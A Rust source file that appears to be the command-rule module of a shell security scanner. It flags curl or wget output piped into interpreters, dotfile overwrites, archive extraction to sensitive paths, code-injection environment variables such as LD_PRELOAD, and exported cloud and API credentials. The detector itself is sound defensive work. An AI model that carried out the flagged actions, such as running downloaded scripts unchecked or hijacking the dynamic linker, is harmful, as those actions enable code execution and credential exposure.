tirith_core/rules/
command.rs

1use crate::extract::ScanContext;
2use crate::tokenize::{self, ShellType};
3use crate::verdict::{Evidence, Finding, RuleId, Severity};
4
5/// Canonical list of known interpreters (lowercase).
6/// Used by `is_interpreter()` and validated against tier-1 regex by drift test.
7pub const INTERPRETERS: &[&str] = &[
8    "sh",
9    "bash",
10    "zsh",
11    "dash",
12    "ksh",
13    "fish",
14    "csh",
15    "tcsh",
16    "ash",
17    "mksh",
18    "python",
19    "python2",
20    "python3",
21    "node",
22    "deno",
23    "bun",
24    "perl",
25    "ruby",
26    "php",
27    "lua",
28    "tclsh",
29    "elixir",
30    "rscript",
31    "pwsh",
32    "iex",
33    "invoke-expression",
34    "cmd",
35];
36
37/// Parse up to `max_digits` from `chars[*i..]` matching `predicate`, interpret as
38/// base-`radix`, and return the corresponding char. Advances `*i` past consumed digits.
39/// Zero heap allocations — uses a fixed stack buffer.
40fn parse_numeric_escape(
41    chars: &[char],
42    i: &mut usize,
43    max_digits: usize,
44    radix: u32,
45    predicate: fn(&char) -> bool,
46) -> Option<char> {
47    let mut buf = [0u8; 8];
48    let mut n = 0;
49    for _ in 0..max_digits {
50        if *i < chars.len() && predicate(&chars[*i]) {
51            buf[n] = chars[*i] as u8;
52            n += 1;
53            *i += 1;
54        } else {
55            break;
56        }
57    }
58    if n == 0 {
59        return None;
60    }
61    let s = std::str::from_utf8(&buf[..n]).ok()?;
62    let val = u32::from_str_radix(s, radix).ok()?;
63    char::from_u32(val)
64}
65
66/// Strip all shell quoting/escaping from a token, producing the effective string
67/// the shell would see after expansion.
68///
69/// Handles: single quotes, double quotes, ANSI-C quoting (`$'...'`), backslash
70/// escaping (POSIX) and backtick escaping (PowerShell).
71fn normalize_shell_token(input: &str, shell: ShellType) -> String {
72    #[derive(PartialEq)]
73    enum QState {
74        Normal,
75        Single,
76        Double,
77        AnsiC,
78    }
79
80    let chars: Vec<char> = input.chars().collect();
81    let len = chars.len();
82    let mut out = String::with_capacity(len);
83    let mut i = 0;
84    let is_ps = matches!(shell, ShellType::PowerShell);
85    let is_cmd = matches!(shell, ShellType::Cmd);
86    let mut state = QState::Normal;
87
88    while i < len {
89        match state {
90            QState::Normal => {
91                let ch = chars[i];
92                if is_cmd && ch == '^' && i + 1 < len {
93                    // Cmd caret escape: skip caret, take next char literal
94                    out.push(chars[i + 1]);
95                    i += 2;
96                } else if !is_ps && !is_cmd && ch == '\\' && i + 1 < len {
97                    // POSIX backslash escape: skip backslash, take next char literal
98                    out.push(chars[i + 1]);
99                    i += 2;
100                } else if is_ps && ch == '`' && i + 1 < len {
101                    // PowerShell backtick escape
102                    out.push(chars[i + 1]);
103                    i += 2;
104                } else if ch == '\'' && !is_cmd {
105                    state = QState::Single;
106                    i += 1;
107                } else if ch == '"' {
108                    state = QState::Double;
109                    i += 1;
110                } else if shell == ShellType::Posix
111                    && ch == '$'
112                    && i + 1 < len
113                    && chars[i + 1] == '\''
114                {
115                    state = QState::AnsiC;
116                    i += 2;
117                } else {
118                    out.push(ch);
119                    i += 1;
120                }
121            }
122            // SINGLE_QUOTE: everything literal until closing '
123            QState::Single => {
124                if chars[i] == '\'' {
125                    // PowerShell: '' inside single quotes is an escaped literal '
126                    if is_ps && i + 1 < len && chars[i + 1] == '\'' {
127                        out.push('\'');
128                        i += 2;
129                    } else {
130                        state = QState::Normal;
131                        i += 1;
132                    }
133                } else {
134                    out.push(chars[i]);
135                    i += 1;
136                }
137            }
138            // DOUBLE_QUOTE
139            QState::Double => {
140                if chars[i] == '"' {
141                    state = QState::Normal;
142                    i += 1;
143                } else if !is_ps && chars[i] == '\\' && i + 1 < len {
144                    // POSIX: only \", \\, \$, \` are special inside double quotes
145                    let next = chars[i + 1];
146                    if next == '"' || next == '\\' || next == '$' || next == '`' {
147                        out.push(next);
148                        i += 2;
149                    } else {
150                        // literal backslash
151                        out.push('\\');
152                        out.push(next);
153                        i += 2;
154                    }
155                } else if is_ps && chars[i] == '`' && i + 1 < len {
156                    // PowerShell backtick escape inside double quotes
157                    out.push(chars[i + 1]);
158                    i += 2;
159                } else {
160                    out.push(chars[i]);
161                    i += 1;
162                }
163            }
164            // ANSIC_QUOTE (POSIX only): decode escape sequences
165            QState::AnsiC => {
166                if chars[i] == '\'' {
167                    state = QState::Normal;
168                    i += 1;
169                } else if chars[i] == '\\' && i + 1 < len {
170                    let esc = chars[i + 1];
171                    match esc {
172                        'n' => {
173                            out.push('\n');
174                            i += 2;
175                        }
176                        't' => {
177                            out.push('\t');
178                            i += 2;
179                        }
180                        'r' => {
181                            out.push('\r');
182                            i += 2;
183                        }
184                        '\\' => {
185                            out.push('\\');
186                            i += 2;
187                        }
188                        '\'' => {
189                            out.push('\'');
190                            i += 2;
191                        }
192                        '"' => {
193                            out.push('"');
194                            i += 2;
195                        }
196                        'a' => {
197                            out.push('\x07');
198                            i += 2;
199                        }
200                        'b' => {
201                            out.push('\x08');
202                            i += 2;
203                        }
204                        'e' | 'E' => {
205                            out.push('\x1b');
206                            i += 2;
207                        }
208                        'f' => {
209                            out.push('\x0c');
210                            i += 2;
211                        }
212                        'v' => {
213                            out.push('\x0b');
214                            i += 2;
215                        }
216                        'x' => {
217                            // \xHH — 1 or 2 hex digits
218                            i += 2;
219                            if let Some(c) =
220                                parse_numeric_escape(&chars, &mut i, 2, 16, char::is_ascii_hexdigit)
221                            {
222                                out.push(c);
223                            }
224                        }
225                        'u' => {
226                            // \uHHHH — 1 to 4 hex digits
227                            i += 2;
228                            if let Some(c) =
229                                parse_numeric_escape(&chars, &mut i, 4, 16, char::is_ascii_hexdigit)
230                            {
231                                out.push(c);
232                            }
233                        }
234                        'U' => {
235                            // \UHHHHHHHH — 1 to 8 hex digits
236                            i += 2;
237                            if let Some(c) =
238                                parse_numeric_escape(&chars, &mut i, 8, 16, char::is_ascii_hexdigit)
239                            {
240                                out.push(c);
241                            }
242                        }
243                        c if c.is_ascii_digit() && c <= '7' => {
244                            // \NNN octal — 1 to 3 octal digits
245                            i += 1; // skip backslash
246                            if let Some(c) = parse_numeric_escape(&chars, &mut i, 3, 8, |c| {
247                                c.is_ascii_digit() && *c <= '7'
248                            }) {
249                                out.push(c);
250                            }
251                        }
252                        _ => {
253                            // Unknown escape: emit literal
254                            out.push('\\');
255                            out.push(esc);
256                            i += 2;
257                        }
258                    }
259                } else {
260                    out.push(chars[i]);
261                    i += 1;
262                }
263            }
264        }
265    }
266    out
267}
268
269/// Extract the effective command base name from a raw token.
270///
271/// Normalize → path basename → first word → lowercase → strip .exe
272fn normalize_cmd_base(raw: &str, shell: ShellType) -> String {
273    let normalized = normalize_shell_token(raw.trim(), shell);
274    basename_from_normalized(&normalized, shell)
275}
276
277/// Extract basename from an already-normalized (unquoted) string.
278/// Handles path separators, first-word extraction, lowercasing, and .exe stripping.
279fn basename_from_normalized(normalized: &str, shell: ShellType) -> String {
280    let has_path_sep = match shell {
281        ShellType::PowerShell | ShellType::Cmd => {
282            normalized.contains('/') || normalized.contains('\\')
283        }
284        _ => normalized.contains('/'),
285    };
286    let after_path = if has_path_sep {
287        match shell {
288            ShellType::PowerShell | ShellType::Cmd => {
289                normalized.rsplit(['/', '\\']).next().unwrap_or(normalized)
290            }
291            _ => normalized.rsplit('/').next().unwrap_or(normalized),
292        }
293    } else {
294        normalized
295    };
296    let first_word = after_path.split_whitespace().next().unwrap_or("");
297    let lower = first_word.to_lowercase();
298    if lower.ends_with(".exe") {
299        lower[..lower.len() - 4].to_string()
300    } else {
301        lower
302    }
303}
304
305fn is_interpreter(cmd: &str) -> bool {
306    INTERPRETERS.contains(&cmd)
307}
308
309/// Run command-shape rules.
310pub fn check(
311    input: &str,
312    shell: ShellType,
313    cwd: Option<&str>,
314    scan_context: ScanContext,
315) -> Vec<Finding> {
316    let mut findings = Vec::new();
317    let segments = tokenize::tokenize(input, shell);
318
319    // Check for pipe-to-interpreter patterns
320    let has_pipe = segments.iter().any(|s| {
321        s.preceding_separator.as_deref() == Some("|")
322            || s.preceding_separator.as_deref() == Some("|&")
323    });
324    if has_pipe {
325        check_pipe_to_interpreter(&segments, shell, &mut findings);
326    }
327
328    // Check for insecure TLS flags in source commands
329    for segment in &segments {
330        if let Some(ref cmd) = segment.command {
331            let cmd_base = normalize_cmd_base(cmd, shell);
332            if is_source_command(&cmd_base) {
333                let tls_findings =
334                    crate::rules::transport::check_insecure_flags(&segment.args, true);
335                findings.extend(tls_findings);
336            }
337        }
338    }
339
340    // Check for dotfile overwrites
341    check_dotfile_overwrite(&segments, &mut findings);
342
343    // Check for archive extraction to sensitive paths
344    check_archive_extract(&segments, &mut findings);
345
346    // Check for cargo install/add without supply-chain audit (exec-only)
347    if scan_context == ScanContext::Exec {
348        check_vet_not_configured(&segments, cwd, &mut findings);
349    }
350
351    // Check for dangerous environment variable exports
352    check_env_var_in_command(&segments, &mut findings);
353
354    // Check for network destination access (metadata endpoints, private networks)
355    check_network_destination(&segments, &mut findings);
356
357    findings
358}
359
360/// Resolve the effective interpreter from a segment, handling all quoting forms,
361/// wrappers (sudo, env, command, exec, nohup), subshells, and brace groups.
362fn resolve_interpreter_name(seg: &tokenize::Segment, shell: ShellType) -> Option<String> {
363    if let Some(ref cmd) = seg.command {
364        let cmd_base = normalize_cmd_base(cmd, shell);
365
366        // Direct interpreter
367        if is_interpreter(&cmd_base) {
368            return Some(cmd_base);
369        }
370
371        // Subshell: (bash) → strip parens, check
372        let stripped = cmd_base.trim_start_matches('(').trim_end_matches(')');
373        if stripped != cmd_base && is_interpreter(stripped) {
374            return Some(stripped.to_string());
375        }
376
377        // Brace group: { → first arg is command
378        if cmd_base == "{" {
379            return resolve_from_args(&seg.args, shell);
380        }
381
382        // Known wrappers
383        match cmd_base.as_str() {
384            "sudo" => return resolve_sudo_args(&seg.args, shell),
385            "env" => return resolve_env_args(&seg.args, shell),
386            "command" | "exec" | "nohup" => {
387                return resolve_wrapper_args(&seg.args, &cmd_base, shell);
388            }
389            _ => {}
390        }
391    }
392    None
393}
394
395#[derive(Clone, Copy)]
396enum ResolverParser {
397    Generic,
398    Sudo,
399    Env,
400    Command,
401    Exec,
402    Nohup,
403}
404
405enum ResolveStep<'a> {
406    Found(String),
407    Next {
408        parser: ResolverParser,
409        args: &'a [String],
410        inspected: usize,
411    },
412    Stop,
413}
414
415/// Resolve interpreter from a generic arg list. Uses an iterative parser with a
416/// token-inspection budget so deeply nested wrappers cannot bypass detection.
417fn resolve_from_args(args: &[String], shell: ShellType) -> Option<String> {
418    resolve_with_parser(args, shell, ResolverParser::Generic)
419}
420
421fn resolve_sudo_args(args: &[String], shell: ShellType) -> Option<String> {
422    resolve_with_parser(args, shell, ResolverParser::Sudo)
423}
424
425fn resolve_env_args(args: &[String], shell: ShellType) -> Option<String> {
426    resolve_with_parser(args, shell, ResolverParser::Env)
427}
428
429fn resolve_wrapper_args(args: &[String], wrapper: &str, shell: ShellType) -> Option<String> {
430    let parser = match wrapper {
431        "command" => ResolverParser::Command,
432        "exec" => ResolverParser::Exec,
433        "nohup" => ResolverParser::Nohup,
434        _ => ResolverParser::Command,
435    };
436    resolve_with_parser(args, shell, parser)
437}
438
439fn resolve_with_parser(
440    args: &[String],
441    shell: ShellType,
442    start_parser: ResolverParser,
443) -> Option<String> {
444    if args.is_empty() {
445        return None;
446    }
447
448    let mut parser = start_parser;
449    let mut current = args;
450    // Budget scales with input size and keeps resolution bounded even on adversarial inputs.
451    let mut budget = args.len().saturating_mul(4).saturating_add(8);
452
453    while budget > 0 && !current.is_empty() {
454        let step = match parser {
455            ResolverParser::Generic => resolve_step_generic(current, shell),
456            ResolverParser::Sudo => resolve_step_sudo(current, shell),
457            ResolverParser::Env => resolve_step_env(current, shell),
458            ResolverParser::Command => resolve_step_wrapper(current, shell, "command"),
459            ResolverParser::Exec => resolve_step_wrapper(current, shell, "exec"),
460            ResolverParser::Nohup => resolve_step_wrapper(current, shell, "nohup"),
461        };
462
463        match step {
464            ResolveStep::Found(interpreter) => return Some(interpreter),
465            ResolveStep::Stop => return None,
466            ResolveStep::Next {
467                parser: next_parser,
468                args: next_args,
469                inspected,
470            } => {
471                parser = next_parser;
472                current = next_args;
473                budget = budget.saturating_sub(inspected.max(1));
474            }
475        }
476    }
477    None
478}
479
480fn resolve_step_generic<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
481    let mut idx = 0;
482    let mut seen_dashdash = false;
483    while idx < args.len() {
484        let raw = args[idx].trim();
485        let normalized = normalize_shell_token(raw, shell);
486
487        // Track end-of-options marker
488        if normalized == "--" {
489            seen_dashdash = true;
490            idx += 1;
491            continue;
492        }
493
494        // Skip flags and assignments (only before --)
495        if !seen_dashdash
496            && (normalized.starts_with("--")
497                || normalized.starts_with('-')
498                || normalized.contains('='))
499        {
500            idx += 1;
501            continue;
502        }
503
504        let base = basename_from_normalized(&normalized, shell);
505        return match base.as_str() {
506            "sudo" => ResolveStep::Next {
507                parser: ResolverParser::Sudo,
508                args: &args[idx + 1..],
509                inspected: idx + 1,
510            },
511            "env" => ResolveStep::Next {
512                parser: ResolverParser::Env,
513                args: &args[idx + 1..],
514                inspected: idx + 1,
515            },
516            "command" => ResolveStep::Next {
517                parser: ResolverParser::Command,
518                args: &args[idx + 1..],
519                inspected: idx + 1,
520            },
521            "exec" => ResolveStep::Next {
522                parser: ResolverParser::Exec,
523                args: &args[idx + 1..],
524                inspected: idx + 1,
525            },
526            "nohup" => ResolveStep::Next {
527                parser: ResolverParser::Nohup,
528                args: &args[idx + 1..],
529                inspected: idx + 1,
530            },
531            _ if is_interpreter(&base) => ResolveStep::Found(base),
532            _ => ResolveStep::Stop,
533        };
534    }
535    ResolveStep::Stop
536}
537
538fn resolve_step_sudo<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
539    let value_short_flags = ["-u", "-g", "-C", "-D", "-R", "-T"];
540    let value_long_flags = [
541        "--user",
542        "--group",
543        "--close-from",
544        "--chdir",
545        "--role",
546        "--type",
547        "--other-user",
548        "--host",
549        "--timeout",
550    ];
551
552    let mut idx = 0;
553    while idx < args.len() {
554        let raw = args[idx].trim();
555        let normalized = normalize_shell_token(raw, shell);
556        // -- ends option parsing; remaining args are the command
557        if normalized == "--" {
558            return ResolveStep::Next {
559                parser: ResolverParser::Generic,
560                args: &args[(idx + 1).min(args.len())..],
561                inspected: idx + 1,
562            };
563        }
564        if normalized.starts_with("--") {
565            if value_long_flags.iter().any(|f| normalized == *f) {
566                idx += 2;
567                continue;
568            }
569            if let Some((key, _)) = normalized.split_once('=') {
570                if value_long_flags.contains(&key) {
571                    idx += 1;
572                    continue;
573                }
574            }
575            // Unknown long flag: treat as boolean.
576            idx += 1;
577            continue;
578        }
579        if normalized.starts_with('-') {
580            if value_short_flags.iter().any(|f| normalized == *f) {
581                // Exact match: e.g. -u → next arg is the value
582                idx += 2;
583            } else if normalized.len() > 2
584                && value_short_flags.iter().any(|f| {
585                    normalized.ends_with(&f[1..]) // last char matches value-flag letter
586                })
587            {
588                // Combined short flags: e.g. -iu → -i + -u, last flag takes a value
589                idx += 2;
590            } else {
591                idx += 1;
592            }
593            continue;
594        }
595        return ResolveStep::Next {
596            parser: ResolverParser::Generic,
597            args: &args[idx..],
598            inspected: idx + 1,
599        };
600    }
601    ResolveStep::Stop
602}
603
604fn resolve_step_env<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
605    let value_short_flags = ["-u", "-C"];
606    let value_long_flags = [
607        "--unset",
608        "--chdir",
609        "--split-string",
610        "--block-signal",
611        "--default-signal",
612        "--ignore-signal",
613    ];
614
615    let mut idx = 0;
616    while idx < args.len() {
617        let raw = args[idx].trim();
618        let normalized = normalize_shell_token(raw, shell);
619        // -- ends option parsing; remaining args are the command
620        if normalized == "--" {
621            return ResolveStep::Next {
622                parser: ResolverParser::Generic,
623                args: &args[(idx + 1).min(args.len())..],
624                inspected: idx + 1,
625            };
626        }
627        if normalized.starts_with("--") {
628            // --split-string: value is a command string.
629            if normalized == "--split-string" {
630                if idx + 1 < args.len() {
631                    let base = normalize_cmd_base(&args[idx + 1], shell);
632                    if is_interpreter(&base) {
633                        return ResolveStep::Found(base);
634                    }
635                }
636                idx += 2;
637                continue;
638            }
639            if let Some(val) = normalized.strip_prefix("--split-string=") {
640                let base = normalize_cmd_base(val, shell);
641                if is_interpreter(&base) {
642                    return ResolveStep::Found(base);
643                }
644                idx += 1;
645                continue;
646            }
647            if value_long_flags.iter().any(|f| normalized == *f) {
648                idx += 2;
649                continue;
650            }
651            if let Some((key, _)) = normalized.split_once('=') {
652                if value_long_flags.contains(&key) {
653                    idx += 1;
654                    continue;
655                }
656            }
657            // Unknown long flag: treat as boolean.
658            idx += 1;
659            continue;
660        }
661        if normalized == "-S" {
662            // -S: value is a command string.
663            if idx + 1 < args.len() {
664                let base = normalize_cmd_base(&args[idx + 1], shell);
665                if is_interpreter(&base) {
666                    return ResolveStep::Found(base);
667                }
668            }
669            idx += 2;
670            continue;
671        }
672        if normalized.starts_with('-') {
673            if value_short_flags.iter().any(|f| normalized == *f) {
674                idx += 2;
675            } else {
676                idx += 1;
677            }
678            continue;
679        }
680        if normalized.contains('=') {
681            idx += 1;
682            continue;
683        }
684        return ResolveStep::Next {
685            parser: ResolverParser::Generic,
686            args: &args[idx..],
687            inspected: idx + 1,
688        };
689    }
690    ResolveStep::Stop
691}
692
693fn resolve_step_wrapper<'a>(
694    args: &'a [String],
695    shell: ShellType,
696    wrapper: &str,
697) -> ResolveStep<'a> {
698    let value_flags: &[&str] = match wrapper {
699        "exec" => &["-a"],
700        _ => &[],
701    };
702
703    let mut idx = 0;
704    while idx < args.len() {
705        let raw = args[idx].trim();
706        let normalized = normalize_shell_token(raw, shell);
707        // -- ends option parsing; remaining args are the command
708        if normalized == "--" {
709            return ResolveStep::Next {
710                parser: ResolverParser::Generic,
711                args: &args[(idx + 1).min(args.len())..],
712                inspected: idx + 1,
713            };
714        }
715        if normalized.starts_with("--") || normalized.starts_with('-') {
716            if value_flags.iter().any(|f| normalized == *f) {
717                idx += 2;
718            } else {
719                idx += 1;
720            }
721            continue;
722        }
723        return ResolveStep::Next {
724            parser: ResolverParser::Generic,
725            args: &args[idx..],
726            inspected: idx + 1,
727        };
728    }
729    ResolveStep::Stop
730}
731
732fn check_pipe_to_interpreter(
733    segments: &[tokenize::Segment],
734    shell: ShellType,
735    findings: &mut Vec<Finding>,
736) {
737    for (i, seg) in segments.iter().enumerate() {
738        if i == 0 {
739            continue;
740        }
741        if let Some(sep) = &seg.preceding_separator {
742            if sep == "|" || sep == "|&" {
743                if let Some(interpreter) = resolve_interpreter_name(seg, shell) {
744                    // i > 0 is guaranteed — the loop skips i == 0 above.
745                    let source = &segments[i - 1];
746                    let source_cmd_ref = source.command.as_deref().unwrap_or("unknown");
747                    let source_base = normalize_cmd_base(source_cmd_ref, shell);
748
749                    // Skip if the source is tirith itself — its output is trusted.
750                    if source_base == "tirith" {
751                        continue;
752                    }
753
754                    let rule_id = match source_base.as_str() {
755                        "curl" => RuleId::CurlPipeShell,
756                        "wget" => RuleId::WgetPipeShell,
757                        "http" | "https" => RuleId::HttpiePipeShell,
758                        "xh" => RuleId::XhPipeShell,
759                        _ => RuleId::PipeToInterpreter,
760                    };
761
762                    let display_cmd = seg.command.as_deref().unwrap_or(&interpreter);
763
764                    let base_desc = format!(
765                        "Command pipes output from '{source_base}' directly to \
766                         interpreter '{interpreter}'. Downloaded content will be \
767                         executed without inspection."
768                    );
769
770                    let description = if is_url_fetch_command(&source_base) {
771                        let show_tirith_run = cfg!(unix)
772                            && supports_tirith_run_hint(&source_base)
773                            && shell != ShellType::PowerShell;
774                        if let Some(url) = extract_url_from_args(&source.args, shell)
775                            .map(|u| sanitize_url_for_display(&u))
776                        {
777                            if show_tirith_run {
778                                format!(
779                                    "{base_desc}\n  Safer: tirith run {url}  \
780                                     \u{2014} or: vet {url}  (https://getvet.sh)"
781                                )
782                            } else {
783                                format!(
784                                    "{base_desc}\n  Safer: vet {url}  \
785                                     (https://getvet.sh)"
786                                )
787                            }
788                        } else if show_tirith_run {
789                            format!(
790                                "{base_desc}\n  Safer: use 'tirith run <url>' \
791                                 or 'vet <url>' (https://getvet.sh) to inspect \
792                                 before executing."
793                            )
794                        } else {
795                            format!(
796                                "{base_desc}\n  Safer: use 'vet <url>' \
797                                 (https://getvet.sh) to inspect before executing."
798                            )
799                        }
800                    } else {
801                        base_desc
802                    };
803
804                    findings.push(Finding {
805                        rule_id,
806                        severity: Severity::High,
807                        title: format!("Pipe to interpreter: {source_cmd_ref} | {display_cmd}"),
808                        description,
809                        evidence: vec![Evidence::CommandPattern {
810                            pattern: "pipe to interpreter".to_string(),
811                            matched: format!("{} | {}", source.raw, seg.raw),
812                        }],
813                        human_view: None,
814                        agent_view: None,
815                        mitre_id: None,
816                        custom_rule_id: None,
817                    });
818                }
819            }
820        }
821    }
822}
823
824fn check_dotfile_overwrite(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
825    for segment in segments {
826        // Check for redirects to dotfiles
827        let raw = &segment.raw;
828        if (raw.contains("> ~/.")
829            || raw.contains("> $HOME/.")
830            || raw.contains(">> ~/.")
831            || raw.contains(">> $HOME/."))
832            && !raw.contains("> /dev/null")
833        {
834            findings.push(Finding {
835                rule_id: RuleId::DotfileOverwrite,
836                severity: Severity::High,
837                title: "Dotfile overwrite detected".to_string(),
838                description: "Command redirects output to a dotfile in the home directory, which could overwrite shell configuration".to_string(),
839                evidence: vec![Evidence::CommandPattern {
840                    pattern: "redirect to dotfile".to_string(),
841                    matched: raw.clone(),
842                }],
843                human_view: None,
844                agent_view: None,
845                mitre_id: None,
846                custom_rule_id: None,
847            });
848        }
849    }
850}
851
852fn check_archive_extract(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
853    for segment in segments {
854        if let Some(ref cmd) = segment.command {
855            let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
856            if cmd_base == "tar" || cmd_base == "unzip" || cmd_base == "7z" {
857                // Check if extracting to a sensitive directory
858                let raw = &segment.raw;
859                let sensitive_targets = [
860                    "-C /",
861                    "-C ~/",
862                    "-C $HOME/",
863                    "-d /",
864                    "-d ~/",
865                    "-d $HOME/",
866                    "> ~/.",
867                    ">> ~/.",
868                ];
869                for target in &sensitive_targets {
870                    if raw.contains(target) {
871                        findings.push(Finding {
872                            rule_id: RuleId::ArchiveExtract,
873                            severity: Severity::Medium,
874                            title: "Archive extraction to sensitive path".to_string(),
875                            description: format!(
876                                "Archive command '{cmd_base}' extracts to a potentially sensitive location"
877                            ),
878                            evidence: vec![Evidence::CommandPattern {
879                                pattern: "archive extract".to_string(),
880                                matched: raw.clone(),
881                            }],
882                            human_view: None,
883                            agent_view: None,
884                mitre_id: None,
885                custom_rule_id: None,
886                        });
887                        return;
888                    }
889                }
890            }
891        }
892    }
893}
894
895// ---------------------------------------------------------------------------
896// Phase 8: Dangerous environment variable detection
897// ---------------------------------------------------------------------------
898
899/// Environment variables that enable arbitrary code injection via dynamic linker.
900const CODE_INJECTION_VARS: &[&str] = &[
901    "LD_PRELOAD",
902    "LD_LIBRARY_PATH",
903    "LD_AUDIT",
904    "DYLD_INSERT_LIBRARIES",
905    "DYLD_LIBRARY_PATH",
906];
907
908/// Environment variables that cause arbitrary script execution at shell startup.
909const SHELL_INJECTION_VARS: &[&str] = &["BASH_ENV", "ENV", "PROMPT_COMMAND"];
910
911/// Environment variables that hijack interpreter module/library search paths.
912const INTERPRETER_HIJACK_VARS: &[&str] = &["PYTHONPATH", "NODE_OPTIONS", "RUBYLIB", "PERL5LIB"];
913
914/// Sensitive credential variable names that should not be exported in commands.
915const SENSITIVE_KEY_VARS: &[&str] = &[
916    "AWS_ACCESS_KEY_ID",
917    "AWS_SECRET_ACCESS_KEY",
918    "AWS_SESSION_TOKEN",
919    "OPENAI_API_KEY",
920    "ANTHROPIC_API_KEY",
921    "GITHUB_TOKEN",
922];
923
924fn classify_env_var(name: &str) -> Option<(RuleId, Severity, &'static str, &'static str)> {
925    let name_upper = name.to_ascii_uppercase();
926    let name = name_upper.as_str();
927    if CODE_INJECTION_VARS.contains(&name) {
928        Some((
929            RuleId::CodeInjectionEnv,
930            Severity::Critical,
931            "Code injection environment variable",
932            "can inject shared libraries into all processes, enabling arbitrary code execution",
933        ))
934    } else if SHELL_INJECTION_VARS.contains(&name) {
935        Some((
936            RuleId::ShellInjectionEnv,
937            Severity::Critical,
938            "Shell injection environment variable",
939            "can cause arbitrary script execution at shell startup",
940        ))
941    } else if INTERPRETER_HIJACK_VARS.contains(&name) {
942        Some((
943            RuleId::InterpreterHijackEnv,
944            Severity::High,
945            "Interpreter hijack environment variable",
946            "can hijack the interpreter's module/library search path",
947        ))
948    } else if SENSITIVE_KEY_VARS.contains(&name) {
949        Some((
950            RuleId::SensitiveEnvExport,
951            Severity::High,
952            "Sensitive credential exported",
953            "exposes a sensitive credential that may be logged in shell history",
954        ))
955    } else {
956        None
957    }
958}
959
960/// Cargo global flags that consume the next token as a value.
961const CARGO_VALUE_FLAGS: &[&str] = &[
962    "-Z",
963    "-C",
964    "--config",
965    "--manifest-path",
966    "--color",
967    "--target-dir",
968    "--target",
969];
970
971/// Find the cargo subcommand (first positional arg), skipping flags and toolchain specs.
972/// Returns true if the subcommand is `install` or `add`.
973fn is_cargo_install_or_add(args: &[String]) -> bool {
974    let mut skip_next = false;
975    for arg in args {
976        if skip_next {
977            skip_next = false;
978            continue;
979        }
980        // Toolchain specs (+nightly, +stable)
981        if arg.starts_with('+') {
982            continue;
983        }
984        // Long flags with = (--config=foo): skip this arg only
985        if arg.starts_with("--") && arg.contains('=') {
986            continue;
987        }
988        // Known value-taking flags: skip this AND next
989        if CARGO_VALUE_FLAGS.contains(&arg.as_str()) {
990            skip_next = true;
991            continue;
992        }
993        // Other flags (--locked, -v, etc.)
994        if arg.starts_with('-') {
995            continue;
996        }
997        // First positional arg is the subcommand — only match install/add
998        return arg == "install" || arg == "add";
999    }
1000    false
1001}
1002
1003/// Warn when `cargo install/add` is used and no supply-chain audit directory exists.
1004fn check_vet_not_configured(
1005    segments: &[tokenize::Segment],
1006    cwd: Option<&str>,
1007    findings: &mut Vec<Finding>,
1008) {
1009    let is_cargo_install = segments.iter().any(|s| {
1010        if let Some(ref cmd) = s.command {
1011            let base = cmd
1012                .rsplit(['/', '\\'])
1013                .next()
1014                .unwrap_or(cmd)
1015                .to_ascii_lowercase();
1016            let base = base.strip_suffix(".exe").unwrap_or(&base);
1017            if base == "cargo" {
1018                return is_cargo_install_or_add(&s.args);
1019            }
1020        }
1021        false
1022    });
1023    if !is_cargo_install {
1024        return;
1025    }
1026
1027    // Check if supply-chain/ config exists relative to the analysis context cwd.
1028    // Require an explicit cwd — without one we cannot reliably check the filesystem.
1029    let cwd = match cwd {
1030        Some(dir) => dir,
1031        None => return,
1032    };
1033    let check_path = std::path::PathBuf::from(cwd).join("supply-chain/config.toml");
1034    if check_path.exists() {
1035        return;
1036    }
1037
1038    findings.push(Finding {
1039        rule_id: RuleId::VetNotConfigured,
1040        severity: Severity::Low,
1041        title: "No supply-chain audit configured".into(),
1042        description: "Consider running `cargo vet init` to enable dependency auditing.".into(),
1043        evidence: vec![],
1044        human_view: None,
1045        agent_view: None,
1046        mitre_id: None,
1047        custom_rule_id: None,
1048    });
1049}
1050
1051fn check_env_var_in_command(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1052    for segment in segments {
1053        let Some(ref cmd) = segment.command else {
1054            continue;
1055        };
1056        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1057
1058        match cmd_base.as_str() {
1059            "export" => {
1060                for arg in &segment.args {
1061                    if let Some((var_name, value)) = arg.split_once('=') {
1062                        emit_env_finding(var_name.trim(), value, findings);
1063                    }
1064                }
1065            }
1066            "env" => {
1067                for arg in &segment.args {
1068                    let trimmed = arg.trim();
1069                    if trimmed.starts_with('-') {
1070                        continue;
1071                    }
1072                    if let Some((var_name, value)) = trimmed.split_once('=') {
1073                        emit_env_finding(var_name.trim(), value, findings);
1074                    }
1075                }
1076            }
1077            "set" => {
1078                // Fish shell: set [-gx] VAR_NAME value...
1079                let mut var_name: Option<&str> = None;
1080                let mut value_parts: Vec<&str> = Vec::new();
1081                for arg in &segment.args {
1082                    let trimmed = arg.trim();
1083                    if trimmed.starts_with('-') && var_name.is_none() {
1084                        continue;
1085                    }
1086                    if var_name.is_none() {
1087                        var_name = Some(trimmed);
1088                    } else {
1089                        value_parts.push(trimmed);
1090                    }
1091                }
1092                if let Some(name) = var_name {
1093                    emit_env_finding(name, &value_parts.join(" "), findings);
1094                }
1095            }
1096            _ => {}
1097        }
1098    }
1099}
1100
1101fn emit_env_finding(var_name: &str, value: &str, findings: &mut Vec<Finding>) {
1102    let Some((rule_id, severity, title_prefix, desc_suffix)) = classify_env_var(var_name) else {
1103        return;
1104    };
1105    let value_preview = redact_env_value(value);
1106    findings.push(Finding {
1107        rule_id,
1108        severity,
1109        title: format!("{title_prefix}: {var_name}"),
1110        description: format!("Setting {var_name} {desc_suffix}"),
1111        evidence: vec![Evidence::EnvVar {
1112            name: var_name.to_string(),
1113            value_preview,
1114        }],
1115        human_view: None,
1116        agent_view: None,
1117        mitre_id: None,
1118        custom_rule_id: None,
1119    });
1120}
1121
1122fn redact_env_value(val: &str) -> String {
1123    let prefix = crate::util::truncate_bytes(val, 20);
1124    if prefix.len() == val.len() {
1125        val.to_string()
1126    } else {
1127        format!("{prefix}...")
1128    }
1129}
1130
1131// ---------------------------------------------------------------------------
1132// Phase 9 (free): Network destination detection
1133// ---------------------------------------------------------------------------
1134
